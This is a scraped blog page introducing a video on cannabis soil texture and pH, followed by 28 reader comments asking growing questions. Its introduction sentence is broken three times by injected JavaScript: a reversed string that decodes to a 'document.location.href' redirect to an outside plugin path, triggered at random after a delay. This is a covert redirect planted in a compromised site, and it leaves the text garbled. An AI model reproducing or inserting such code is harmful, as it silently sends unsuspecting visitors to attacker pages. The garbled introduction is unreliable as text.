Soil Growing 101 – Texture, pH, Makeup – Cannabis Gardening

An explanation of what soil is made of, an introduction toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to silt,clay,loam and other textures, as well as a brief overview of pH and how toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to adjust it in soil, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}today on Lex’s World.

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28 thoughts on “Soil Growing 101 – Texture, pH, Makeup – Cannabis Gardening”

  1. Skyro Boss says:

    What do u think of black magic pro peat blend?

  2. Trevor Wilson says:

    I use 8 types of manure mixed, dump truck load, spread it a foot thick add 100lbs of lobster shells and 100lbs of sea weed and 100lbs of calcium . Till for 2 hours . Put it in four, 50 gallon buckets with 2 dozen 1 " holes to give the roots oxygen , then transplant 3' plants and look out.i had a 14'4 plant that was topped and put outdoors June 14th and harvested September 10th and I got 6 pound 4oz. Total of the 4 was 15 pounds 5ozs ,and I have over 4 pounds of popcorn or bunk that 99% of people would add to there big total.i give it to a war veteran up the road.he says it takes away his nightmares. WW2 trench soldier .

  3. Meaux Jeaux says:

    It's a whole lot cheaper to keep rehabbing the soil than to constantly replace it

  4. Death_trap_auto says:

    Is it just me or am I high

  5. matt s says:

    do you till your soil in the pots?

  6. Toni Gillis says:

    lex i hope i can show you now what i have been doing with soil and manures and now have moved on to microbes and nematodes I started worm composting with 3 types of worm red wrigglers, pot worms, and European nightcrawler i am trying to crover crops in the future i i wounder if worm farming in pots and growing weed in the pot with out cover crop im shore ill need a covering on top the soil i found the grass clipping does not just add nitrogen but clings to the top of soil and stops bugs from laying eggs in soil works awsome on funges nates i wood like to keep you posted on what i am doing but im not shore how i try to get thing started on face book if i can

  7. Caleb Aaron Lloyd says:

    What an interesting accent! Wonder where it's from…

  8. Jeff weezy says:

    do you know if soil grown is more potent than coco grown ?

  9. Ivan Rubio Picazo says:

    You should do more videos on outdoor growing for the outdoor growers

  10. Trip Soup says:

    hey Lex, which is your preference between coco or soil? Is there a difference in bud quality based on medium?

  11. The Muckler says:

    Good soil doesn't care about PH

  12. SOILFIT says:

    Sand Silt and Clay..clay is amazing stuff

  13. Clifford Adkins says:

    I live in West Virginia where mountains all around and loamy is the soil think It be good for indoors

  14. EVAN GASSEN says:

    What does black dirt fall under then

  15. tony diaz says:

    Love your info you give out. Here goes a virtual hug

  16. Danny 86 says:

    I Think best way to Controll ph is citric acid

  17. specUVdust says:

    No more you use soyl. You use must use airoponics now. Hurry go now

  18. Boxing Finland says:

    where can buy your t shirt ?

  19. Neal Young says:

    Is there a way to amen the soil ph on the fly? I've got girls going to flower and the ph seems a bit on the high end. They're doing good, but I fear a problem on the horizon.

  20. William Munny says:

    I've always used tap water just let it sit 24hrs for chlorine to dissipate, never had an issue.

  21. Mary Jane says:

    I get mine from a vegi patch I've been ammending for many years

  22. ricardo costa says:

    Hi Lex, top channel, much better than most 420 channels on youtube…The only thing im not happy about is that i cant use your links for shopping since i live in Europe, not in Canada or U.S, …Love the channel bro, keep it up and stay high 🙂
    All the best

  23. shubham gupta says:

    Remove nerdy googles

  24. chilling with Howie says:

    When do I give my seedlings there first full water . I got 3 auto 10days and 5 three days all in 3 gal fab pots …need info…thanks

  25. Anthony Morales says:

    How do you check the ph level in soil?

  26. Francis Bremner says:

    Lex…whens best for watering your plants?

  27. gdogg2000 says:

    Growers make it look so easy but this plant is one of the hardest ever! I want to rip my hair out!!!!

  28. Smoke Screen says:

    Hi Lex.. can you do a video on smoking pipe resins. Also thanks for your vids, respect from Australia bud.

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